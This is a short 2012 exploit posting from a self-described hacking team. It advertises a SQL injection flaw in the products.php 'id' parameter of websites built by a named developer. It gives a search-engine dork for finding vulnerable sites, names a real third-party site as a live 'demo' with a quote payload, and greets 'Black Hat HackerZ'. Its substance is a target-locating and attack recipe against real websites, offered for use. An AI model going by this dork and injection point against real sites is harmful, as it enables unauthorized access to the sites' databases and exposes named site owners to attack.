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Tariq Rauf SQL Injection

Posted on 20 September 2012

################################################################ ---------------------------------------------------------------- Tariq Rauf SQL Injection Vulnerability ---------------------------------------------------------------- ################################################################ # Exploit Title : Tariq Rauf SQL Injection Vulnerability # Author : Hack Center Security Team # Discovered By : Net.W0lf # Software Link : [ www.tariqrauf.com ] # Date : 9/20/2012 # E-Mail : Bl4ck.intell@gmail.com & Net-W0lf@att.net # D0rK : intext:" Site by Tariq Rauf " ################################################################ ---------------------------------------------------------------- +-----------------------+ | SQL Injection | +-----------------------+ 3xpl0!T : [TaRgeT]/products.php?id=[SQl] D3m0: www.getsolmate.com/products.php?id=' Greets To : | Am!r | B3HZ4D | Packetstormsecurity.org | Exploit-db.com | | And All Iranian Black Hat HackerZ | ===========================================# End #=============================================